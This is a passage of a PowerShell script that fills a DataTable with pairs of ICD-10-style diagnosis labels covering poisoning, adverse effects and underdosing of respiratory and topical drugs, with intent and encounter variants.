unspecified agents primarily acting on the respiratory system, assault","Poisoning by unspecified agents primarily acting on the respiratory system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, undetermined","Poisoning by unspecified agents primarily acting on the respiratory system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, undetermined","Poisoning by unspecified agents primarily acting on the respiratory system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, undetermined","Poisoning by unspecified agents primarily acting on the respiratory system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily acting on the respiratory system","Adverse effect of unspecified agents primarily acting on the respiratory system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily acting on the respiratory system","Adverse effect of unspecified agents primarily acting on the respiratory system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily acting on the respiratory system","Adverse effect of unspecified agents primarily acting on the respiratory system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily acting on the respiratory system","Underdosing of unspecified agents primarily acting on the respiratory system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily acting on the respiratory system","Underdosing of unspecified agents primarily acting on the respiratory system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily acting on the respiratory system","Underdosing of unspecified agents primarily acting on the respiratory system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by other agents primarily acting on the respiratory system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, intentional self-harm","Poisoning by other agents primarily acting on the respiratory system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, intentional self-harm","Poisoning by other agents primarily acting on the respiratory system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, intentional self-harm","Poisoning by other agents primarily acting on the respiratory system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, assault","Poisoning by other agents primarily acting on the respiratory system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, assault","Poisoning by other agents primarily acting on the respiratory system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, assault","Poisoning by other agents primarily acting on the respiratory system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, undetermined","Poisoning by other agents primarily acting on the respiratory system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, undetermined","Poisoning by other agents primarily acting on the respiratory system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily acting on the respiratory system, undetermined","Poisoning by other agents primarily acting on the respiratory system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily acting on the respiratory system","Adverse effect of other agents primarily acting on the respiratory system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily acting on the respiratory system","Adverse effect of other agents primarily acting on the respiratory system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily acting on the respiratory system","Adverse effect of other agents primarily acting on the respiratory system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily acting on the respiratory system","Underdosing of other agents primarily acting on the respiratory system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily acting on the respiratory system","Underdosing of other agents primarily acting on the respiratory system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily acting on the respiratory system","Underdosing of other agents primarily acting on the respiratory system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional)","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional)","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional)","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined","Poisoning by local antifungal, anti-infective and anti-inflammatory drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs","Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs","Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs","Adverse effect of local antifungal, anti-infective and anti-inflammatory drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of local antifungal, anti-infective and anti-inflammatory drugs","Underdosing of local antifungal, anti-infective and anti-inflammatory drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local antifungal, anti-infective and anti-inflammatory drugs","Underdosing of local antifungal, anti-infective and anti-inflammatory drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local antifungal, anti-infective and anti-inflammatory drugs","Underdosing of local antifungal, anti-infective and anti-inflammatory drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, accidental (unintentional)","Poisoning by antipruritics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, accidental (unintentional)","Poisoning by antipruritics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, accidental (unintentional)","Poisoning by antipruritics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, intentional self-harm","Poisoning by antipruritics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, intentional self-harm","Poisoning by antipruritics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, intentional self-harm","Poisoning by antipruritics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, assault","Poisoning by antipruritics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, assault","Poisoning by antipruritics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, assault","Poisoning by antipruritics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, undetermined","Poisoning by antipruritics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, undetermined","Poisoning by antipruritics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antipruritics, undetermined","Poisoning by antipruritics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antipruritics","Adverse effect of antipruritics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antipruritics","Adverse effect of antipruritics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antipruritics","Adverse effect of antipruritics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antipruritics","Underdosing of antipruritics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antipruritics","Underdosing of antipruritics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antipruritics","Underdosing of antipruritics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, accidental (unintentional)","Poisoning by local astringents and local detergents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, accidental (unintentional)","Poisoning by local astringents and local detergents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, accidental (unintentional)","Poisoning by local astringents and local detergents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, intentional self-harm","Poisoning by local astringents and local detergents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, intentional self-harm","Poisoning by local astringents and local detergents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, intentional self-harm","Poisoning by local astringents and local detergents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, assault","Poisoning by local astringents and local detergents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, assault","Poisoning by local astringents and local detergents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, assault","Poisoning by local astringents and local detergents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, undetermined","Poisoning by local astringents and local detergents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, undetermined","Poisoning by local astringents and local detergents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by local astringents and local detergents, undetermined","Poisoning by local astringents and local detergents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of local astringents and local detergents","Adverse effect of local astringents and local detergents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local astringents and local detergents","Adverse effect of local astringents and local detergents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of local astringents and local detergents","Adverse effect of local astringents and local detergents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of local astringents and local detergents","Underdosing of local astringents and local detergents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local astringents and local detergents","Underdosing of local astringents and local detergents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of local astringents and local detergents","Underdosing of local astringents and local detergents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, accidental (unintentional)","Poisoning by emollients, demulcents and protectants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, accidental (unintentional)","Poisoning by emollients, demulcents and protectants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, accidental (unintentional)","Poisoning by emollients, demulcents and protectants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, intentional self-harm","Poisoning by emollients, demulcents and protectants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, intentional self-harm","Poisoning by emollients, demulcents and protectants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, intentional self-harm","Poisoning by emollients, demulcents and protectants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, assault","Poisoning by emollients, demulcents and protectants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, assault","Poisoning by emollients, demulcents and protectants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, assault","Poisoning by emollients, demulcents and protectants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, undetermined","Poisoning by emollients, demulcents and protectants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, undetermined","Poisoning by emollients, demulcents and protectants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emollients, demulcents and protectants, undetermined","Poisoning by emollients, demulcents and protectants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of emollients, demulcents and protectants","Adverse effect of emollients, demulcents and protectants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of emollients, demulcents and protectants","Adverse effect of emollients, demulcents and protectants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of emollients, demulcents and protectants","Adverse effect of emollients, demulcents and protectants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of emollients, demulcents and protectants","Underdosing of emollients, demulcents and protectants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of emollients, demulcents and protectants","Underdosing of emollients, demulcents and protectants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of emollients, demulcents and protectants","Underdosing of emollients, demulcents and protectants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional)","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional)","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional)","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined","Poisoning by keratolytics, keratoplastics, and other hair treatment drugs and preparations, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Adverse effect of keratolytics, keratoplastics, and other hair treatment drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations","Underdosing of keratolytics, keratoplastics, and other hair treatment drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, accidental (unintentional)","Poisoning by ophthalmological drugs and preparations, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, accidental (unintentional)","Poisoning by ophthalmological drugs and preparations, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, accidental (unintentional)","Poisoning by ophthalmological drugs and preparations, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, intentional self-harm","Poisoning by ophthalmological drugs and preparations, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, intentional self-harm","Poisoning by ophthalmological drugs and preparations, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, intentional self-harm","Poisoning by ophthalmological drugs and preparations, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, assault","Poisoning by ophthalmological drugs and preparations, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, assault","Poisoning by ophthalmological drugs and preparations, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, assault","Poisoning by ophthalmological drugs and preparations, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, undetermined","Poisoning by ophthalmological drugs and preparations, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, undetermined","Poisoning by ophthalmological drugs and preparations, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ophthalmological drugs and preparations, undetermined","Poisoning by ophthalmological drugs and preparations, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of ophthalmological drugs and preparations","Adverse effect of ophthalmological drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of ophthalmological drugs and preparations","Adverse effect of ophthalmological drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of ophthalmological drugs and preparations","Adverse effect of ophthalmological drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of ophthalmological drugs and preparations","Underdosing of ophthalmological drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of ophthalmological drugs and preparations","Underdosing of ophthalmological drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of ophthalmological drugs and preparations","Underdosing of ophthalmological drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional)","Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional)","Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional)","Poisoning by otorhinolaryngological drugs and preparations, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm","Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm","Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm","Poisoning by otorhinolaryngological drugs and preparations, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, assault","Poisoning by otorhinolaryngological drugs and preparations, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, assault","Poisoning by otorhinolaryngological drugs and preparations, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, assault","Poisoning by otorhinolaryngological drugs and preparations, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, undetermined","Poisoning by otorhinolaryngological drugs and preparations, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, undetermined","Poisoning by otorhinolaryngological drugs and preparations, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by otorhinolaryngological drugs and preparations, undetermined","Poisoning by otorhinolaryngological drugs and preparations, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of otorhinolaryngological drugs and preparations","Adverse effect of otorhinolaryngological drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of otorhinolaryngological drugs and preparations","Adverse effect of otorhinolaryngological drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of otorhinolaryngological drugs and preparations","Adverse effect of otorhinolaryngological drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of otorhinolaryngological drugs and preparations","Underdosing of otorhinolaryngological drugs and preparations, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of otorhinolaryngological drugs and preparations","Underdosing of otorhinolaryngological drugs and preparations, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of otorhinolaryngological drugs and preparations","Underdosing of otorhinolaryngological drugs and preparations, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, accidental (unintentional)","Poisoning by dental drugs, topically applied, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, accidental (unintentional)","Poisoning by dental drugs, topically applied, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, accidental (unintentional)","Poisoning by dental drugs, topically applied, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, intentional self-harm","Poisoning by dental drugs, topically applied, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, intentional self-harm","Poisoning by dental drugs, topically applied, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, intentional self-harm","Poisoning by dental drugs, topically applied, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, assault","Poisoning by dental drugs, topically applied, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, assault","Poisoning by dental drugs, topically applied, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, assault","Poisoning by dental drugs, topically applied, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, undetermined","Poisoning by dental drugs, topically applied, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, undetermined","Poisoning by dental drugs, topically applied, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by dental drugs, topically applied, undetermined","Poisoning by dental drugs, topically applied, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of dental drugs, topically applied","Adverse effect of dental drugs, topically applied, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of dental drugs, topically applied","Adverse effect of dental drugs, topically applied, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of dental drugs, topically applied","Adverse effect of dental drugs, topically applied, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of dental drugs, topically applied","Underdosing of dental drugs, topically applied, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of dental drugs, topically applied","Underdosing of dental drugs, topically applied, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of dental drugs, topically applied","Underdosing of dental drugs, topically applied, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, accidental (unintentional)","Poisoning by other topical agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, accidental (unintentional)","Poisoning by other topical agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, accidental (unintentional)","Poisoning by other topical agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, intentional self-harm","Poisoning by other topical agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, intentional self-harm","Poisoning by other topical agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, intentional self-harm","Poisoning by other topical agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, assault","Poisoning by other topical agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, assault","Poisoning by other topical agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, assault","Poisoning by other topical agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, undetermined","Poisoning by other topical agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, undetermined","Poisoning by other topical agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other topical agents, undetermined","Poisoning by other topical agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other topical agents","Adverse effect of other topical agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other topical agents","Adverse effect of other topical agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other topical agents","Adverse effect of other topical agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other topical agents","Underdosing of other topical agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other topical agents","Underdosing of other topical agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other topical agents","Underdosing of other topical agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, accidental (unintentional)","Poisoning by unspecified topical agent, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, accidental (unintentional)","Poisoning by unspecified topical agent, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, accidental (unintentional)","Poisoning by unspecified topical agent, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, intentional self-harm","Poisoning by unspecified topical agent, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, intentional self-harm","Poisoning by unspecified topical agent, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, intentional self-harm","Poisoning by unspecified topical agent, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, assault","Poisoning by unspecified topical agent, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, assault","Poisoning by unspecified topical agent, assault, subsequent encounter") + $null = 